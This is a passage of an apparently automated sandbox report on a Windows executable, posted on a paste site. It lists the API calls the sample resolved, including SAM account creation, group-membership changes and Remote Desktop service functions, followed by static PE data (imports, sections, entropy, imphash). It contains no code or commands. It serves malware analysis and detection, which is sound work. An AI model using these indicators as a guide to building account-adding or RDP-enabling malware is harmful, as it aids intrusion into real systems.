- "kernel32.dll.GetOEMCP",
- "kernel32.dll.GlobalReAlloc",
- "kernel32.dll.WaitForMultipleObjectsEx",
- "kernel32.dll.lstrcmpiW",
- "kernel32.dll.WritePrivateProfileStringW",
- "kernel32.dll.GlobalFindAtomW",
- "urlmon.dll.CoInternetCreateSecurityManager",
- "urlmon.dll.CoInternetCreateZoneManager",
- "urlmon.dll.CoInternetIsFeatureEnabledForUrl",
- "samlib.dll.SamConnect",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcStringFreeW",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamLookupDomainInSamServer",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamCreateUser2InDomain",
- "samlib.dll.SamQueryInformationUser",
- "samlib.dll.SamSetInformationUser",
- "cryptbase.dll.SystemFunction028",
- "rpcrt4.dll.NDRCContextBinding",
- "rpcrt4.dll.RpcBindingToStringBindingW",
- "rpcrt4.dll.I_RpcMapWin32Status",
- "rpcrt4.dll.RpcStringBindingParseW",
- "samlib.dll.SamCloseHandle",
- "sechost.dll.LookupAccountSidLocalW",
- "advapi32.dll.LsaOpenPolicy",
- "advapi32.dll.LsaLookupNames2",
- "advapi32.dll.LsaClose",
- "advapi32.dll.LsaFreeMemory",
- "samlib.dll.SamLookupNamesInDomain",
- "samlib.dll.SamOpenAlias",
- "samlib.dll.SamAddMemberToAlias",
- "linkinfo.dll.IsValidLinkInfo",
- "propsys.dll.#417",
- "propsys.dll.PSGetNameFromPropertyKey",
- "propsys.dll.PSStringFromPropertyKey",
- "propsys.dll.InitVariantFromBuffer",
- "propsys.dll.PropVariantToGUID",
- "advapi32.dll.GetSecurityInfo",
- "advapi32.dll.SetSecurityInfo",
- "advapi32.dll.GetSecurityDescriptorControl",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "ole32.dll.CoInitializeSecurity",
- "sechost.dll.LookupAccountNameLocalW",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.GetTickCount64",
- "sqlmap.dll.ServiceMain",
- "sqlmap.dll.SvchostPushServiceGlobals",
- "termsrv.dll.ServiceMain",
- "termsrv.dll.SvchostPushServiceGlobals",
- "ole32.dll.CoFreeUnusedLibrariesEx",
- "ole32.dll.CoRegisterClassObject",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "ole32.dll.CoGetClassObject",
- "ole32.dll.CoGetMarshalSizeMax",
- "ole32.dll.CoMarshalInterface",
- "ole32.dll.CoUnmarshalInterface",
- "ole32.dll.StringFromIID",
- "ole32.dll.CoGetPSClsid",
- "ole32.dll.CoReleaseMarshalData",
- "ole32.dll.DcomChannelSetHResult",
- "ole32.dll.CoImpersonateClient",
- "advapi32.dll.OpenThreadToken",
- "ole32.dll.CoRevertToSelf",
- "advapi32.dll.QueryTraceW",
- "lsmproxy.dll.DllGetClassObject",
- "lsmproxy.dll.DllCanUnloadNow",
- "regapi.dll.RegGetMachinePolicyEx",
- "secur32.dll.InitSecurityInterfaceW",
- "cryptsp.dll.SystemFunction035",
- "user32.dll.LoadStringW",
- "ole32.dll.CLSIDFromString",
- "regapi.dll.RegQueryListenerStart",
- "rdpwsx.dll.WsxInitialize",
- "rdpwsx.dll.WsxDestroy",
- "rdpwsx.dll.WsxConnect",
- "rdpwsx.dll.WsxDisconnect",
- "rdpwsx.dll.WsxInitializeClientData",
- "rdpwsx.dll.WsxConvertPublishedApp",
- "rdpwsx.dll.WsxWinStationInitialize",
- "rdpwsx.dll.WsxWinStationRundown",
- "rdpwsx.dll.WsxVirtualChannelSecurity",
- "rdpwsx.dll.WsxIcaStackIoControl",
- "rdpwsx.dll.WsxBrokenConnection",
- "rdpwsx.dll.WsxLogonNotify",
- "rdpwsx.dll.WsxSetErrorInfo",
- "rdpwsx.dll.WsxSendAutoReconnectStatus",
- "rdpwsx.dll.WsxEscape",
- "rdpwsx.dll.WsxOpenVirtualChannel",
- "rdpwsx.dll.WsxCanLogonProceed",
- "rdpwsx.dll.WsxGetConnectionProperty",
- "rdpwsx.dll.WsxAutomationVerification",
- "rdpwsx.dll.WsxVerify",
- "rdpwsx.dll.WsxExchangeStackConfig",
- "rdpwsx.dll.WsxQueryGatewayPolicies",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.StartServiceW",
- "sechost.dll.CloseServiceHandle",
- "crypt32.dll.CryptProtectData",
- "cryptbase.dll.SystemFunction040",
- "rpcrt4.dll.NdrClientCall3",
- "sechost.dll.ControlService",
- "umrdp.dll.ServiceMain",
- "umrdp.dll.SvchostPushServiceGlobals",
- "sechost.dll.RegisterServiceCtrlHandlerExW",
- "sechost.dll.SetServiceStatus",
- "sechost.dll.QueryServiceStatus",
- "setupapi.dll.SetupDiGetClassDevsW",
- "setupapi.dll.SetupDiEnumDeviceInterfaces",
- "setupapi.dll.SetupDiEnumDeviceInfo",
- "setupapi.dll.SetupDiGetDeviceRegistryPropertyW",
- "setupapi.dll.SetupDiGetDeviceInterfaceDetailW",
- "setupapi.dll.SetupDiDestroyDeviceInfoList",
- "ole32.dll.CLSIDFromProgID",
- "rpcrt4.dll.RpcServerUseProtseqEpW",
- "rpcrt4.dll.RpcServerRegisterIfEx",
- "rpcrt4.dll.RpcServerListen",
- "rpcrt4.dll.RpcServerUnregisterIfEx",
- "setupapi.dll.SetupDiOpenDevRegKey",
- "rpcrt4.dll.RpcServerUnregisterIf"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FlushFileBuffers",
- "address": "0x43603c"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x436040"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x436044"
- },
- {
- "name": "HeapSize",
- "address": "0x436048"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x43604c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x436050"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x436054"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x436058"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x43605c"
- },
- {
- "name": "SetStdHandle",
- "address": "0x436060"
- },
- {
- "name": "CreateFileW",
- "address": "0x436064"
- },
- {
- "name": "AllocConsole",
- "address": "0x436068"
- },
- {
- "name": "GetGeoInfoA",
- "address": "0x43606c"
- },
- {
- "name": "K32EnumPageFilesW",
- "address": "0x436070"
- },
- {
- "name": "DefineDosDeviceW",
- "address": "0x436074"
- },
- {
- "name": "Sleep",
- "address": "0x436078"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x43607c"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x436080"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x436084"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x436088"
- },
- {
- "name": "GetCPInfo",
- "address": "0x43608c"
- },
- {
- "name": "GetOEMCP",
- "address": "0x436090"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x436094"
- },
- {
- "name": "FindNextFileA",
- "address": "0x436098"
- },
- {
- "name": "VirtualProtect",
- "address": "0x43609c"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x4360a0"
- },
- {
- "name": "FindFirstFileExA",
- "address": "0x4360a4"
- },
- {
- "name": "FindClose",
- "address": "0x4360a8"
- },
- {
- "name": "CloseHandle",
- "address": "0x4360ac"
- },
- {
- "name": "GetFileType",
- "address": "0x4360b0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x4360b4"
- },
- {
- "name": "HeapFree",
- "address": "0x4360b8"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4360bc"
- },
- {
- "name": "GetACP",
- "address": "0x4360c0"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x4360c4"
- },
- {
- "name": "ExitProcess",
- "address": "0x4360c8"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x4360cc"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x4360d0"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x4360d4"
- },
- {
- "name": "WriteFile",
- "address": "0x4360d8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x4360dc"
- },
- {
- "name": "RaiseException",
- "address": "0x4360e0"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x4360e4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x4360e8"
- },
- {
- "name": "FreeLibrary",
- "address": "0x4360ec"
- },
- {
- "name": "TlsFree",
- "address": "0x4360f0"
- },
- {
- "name": "TlsSetValue",
- "address": "0x4360f4"
- },
- {
- "name": "TlsGetValue",
- "address": "0x4360f8"
- },
- {
- "name": "TlsAlloc",
- "address": "0x4360fc"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x436100"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x436104"
- },
- {
- "name": "DecodePointer",
- "address": "0x436108"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x43610c"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x436110"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x436114"
- },
- {
- "name": "TerminateProcess",
- "address": "0x436118"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x43611c"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x436120"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x436124"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x436128"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x43612c"
- },
- {
- "name": "InitializeSListHead",
- "address": "0x436130"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x436134"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x436138"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x43613c"
- },
- {
- "name": "RtlUnwind",
- "address": "0x436140"
- },
- {
- "name": "GetLastError",
- "address": "0x436144"
- },
- {
- "name": "SetLastError",
- "address": "0x436148"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x43614c"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x436150"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "FindWindowW",
- "address": "0x4361b4"
- },
- {
- "name": "GetTouchInputInfo",
- "address": "0x4361b8"
- },
- {
- "name": "DdeCmpStringHandles",
- "address": "0x4361bc"
- },
- {
- "name": "MessageBoxA",
- "address": "0x4361c0"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x4361e4"
- }
- ],
- "dll": "WINSPOOL.DRV"
- },
- {
- "imports": [
- {
- "name": "DuplicateToken",
- "address": "0x436000"
- },
- {
- "name": "ObjectPrivilegeAuditAlarmA",
- "address": "0x436004"
- },
- {
- "name": "PerfDecrementULongCounterValue",
- "address": "0x436008"
- },
- {
- "name": "CredUnmarshalCredentialA",
- "address": "0x43600c"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "VarBstrFromDate",
- "address": "0x436170"
- }
- ],
- "dll": "OLEAUT32.dll"
- },
- {
- "imports": [
- {
- "name": "AVIStreamRelease",
- "address": "0x436014"
- }
- ],
- "dll": "AVIFIL32.dll"
- },
- {
- "imports": [
- {
- "name": "DeregisterManageableLogClient",
- "address": "0x4361f8"
- }
- ],
- "dll": "clfsw32.dll"
- },
- {
- "imports": [
- {
- "name": "ClusterNodeGetEnumCount",
- "address": "0x43601c"
- }
- ],
- "dll": "CLUSAPI.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_AddMasked",
- "address": "0x436024"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "UnDecorateSymbolNameW",
- "address": "0x436200"
- }
- ],
- "dll": "dbghelp.dll"
- },
- {
- "imports": [
- {
- "name": "DnsDhcpRegisterHostAddrs",
- "address": "0x43602c"
- }
- ],
- "dll": "DNSAPI.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436208"
- }
- ],
- "dll": "dsuiext.dll"
- },
- {
- "imports": [
- {
- "name": "GetMonitorContrast",
- "address": "0x436210"
- }
- ],
- "dll": "dxva2.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436218"
- },
- {
- "name": "GdipDisposeImageAttributes",
- "address": "0x43621c"
- },
- {
- "name": "GdipGetImageFlags",
- "address": "0x436220"
- },
- {
- "name": "GdipSetPathGradientPresetBlend",
- "address": "0x436224"
- }
- ],
- "dll": "gdiplus.dll"
- },
- {
- "imports": [
- {
- "name": "NotifyAddrChange",
- "address": "0x436034"
- }
- ],
- "dll": "IPHLPAPI.DLL"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436158"
- }
- ],
- "dll": "MAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "MprAdminInterfaceGetCredentials",
- "address": "0x436160"
- }
- ],
- "dll": "MPRAPI.dll"
- },
- {
- "imports": [
- {
- "name": "DRMGetEnvironmentInfo",
- "address": "0x43622c"
- }
- ],
- "dll": "msdrm.dll"
- },
- {
- "imports": [
- {
- "name": "ICInfo",
- "address": "0x436168"
- }
- ],
- "dll": "MSVFW32.dll"
- },
- {
- "imports": [
- {
- "name": "glColor4sv",
- "address": "0x436178"
- }
- ],
- "dll": "OPENGL32.dll"
- },
- {
- "imports": [
- {
- "name": "VariantToUInt32",
- "address": "0x436180"
- }
- ],
- "dll": "PROPSYS.dll"
- },
- {
- "imports": [
- {
- "name": "ResUtilSetResourceServiceEnvironment",
- "address": "0x436188"
- }
- ],
- "dll": "RESUTILS.dll"
- },
- {
- "imports": [
- {
- "name": "RpcServerListen",
- "address": "0x436190"
- },
- {
- "name": "NdrConformantStringMemorySize",
- "address": "0x436194"
- }
- ],
- "dll": "RPCRT4.dll"
- },
- {
- "imports": [
- {
- "name": "MgmDeleteGroupMembershipEntry",
- "address": "0x436234"
- }
- ],
- "dll": "rtm.dll"
- },
- {
- "imports": [
- {
- "name": "CM_Add_Range",
- "address": "0x43619c"
- }
- ],
- "dll": "SETUPAPI.dll"
- },
- {
- "imports": [
- {
- "name": "DllRegisterWindowClasses",
- "address": "0x4361a4"
- }
- ],
- "dll": "SHDOCVW.dll"
- },
- {
- "imports": [
- {
- "name": "lineGetAddressCaps",
- "address": "0x4361ac"
- }
- ],
- "dll": "TAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "WsCreateMessageForChannel",
- "address": "0x43623c"
- }
- ],
- "dll": "webservices.dll"
- },
- {
- "imports": [
- {
- "name": "WinBioControlUnit",
- "address": "0x436244"
- }
- ],
- "dll": "winbio.dll"
- },
- {
- "imports": [
- {
- "name": "IWICMetadataQueryReader_GetLocation_Proxy",
- "address": "0x4361ec"
- },
- {
- "name": "IWICImagingFactory_CreateFastMetadataEncoderFromDecoder_Proxy",
- "address": "0x4361f0"
- }
- ],
- "dll": "WindowsCodecs.dll"
- },
- {
- "imports": [
- {
- "name": "WinHttpQueryOption",
- "address": "0x4361c8"
- }
- ],
- "dll": "WINHTTP.dll"
- },
- {
- "imports": [
- {
- "name": "FindNextUrlCacheContainerW",
- "address": "0x4361d0"
- },
- {
- "name": "InternetCheckConnectionA",
- "address": "0x4361d4"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "waveOutGetErrorTextW",
- "address": "0x4361dc"
- }
- ],
- "dll": "WINMM.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x43624c"
- }
- ],
- "dll": "wsnmp32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x000a0d78",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x0042685e",
- "timestamp": "2019-06-23 22:20:50",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00034800",
- "entropy": "6.32",
- "raw_address": "0x00000400",
- "virtual_size": "0x0003461b",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00036000",
- "size_of_data": "0x00008c00",
- "entropy": "5.45",
- "raw_address": "0x00034c00",
- "virtual_size": "0x00008bd6",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003f000",
- "size_of_data": "0x0004ee00",
- "entropy": "6.08",
- "raw_address": "0x0003d800",
- "virtual_size": "0x0005045c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00090000",
- "size_of_data": "0x00000600",
- "entropy": "4.70",
- "raw_address": "0x0008c600",
- "virtual_size": "0x00000488",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00091000",
- "size_of_data": "0x00007a00",
- "entropy": "6.45",
- "raw_address": "0x0008cc00",
- "virtual_size": "0x0000799c",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003dc34",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x000002bc"
- },
- {
- "virtual_address": "0x00090000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000488"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00091000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x0000799c"
- },
- {
- "virtual_address": "0x0003d520",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x0000001c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003d540",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000040"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00036000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000254"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "c8503ab5366fc6e13552bba734a2de16",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 34,
- "versioninfo": []
- }
- }
Add Comment
Please, Sign In to add comment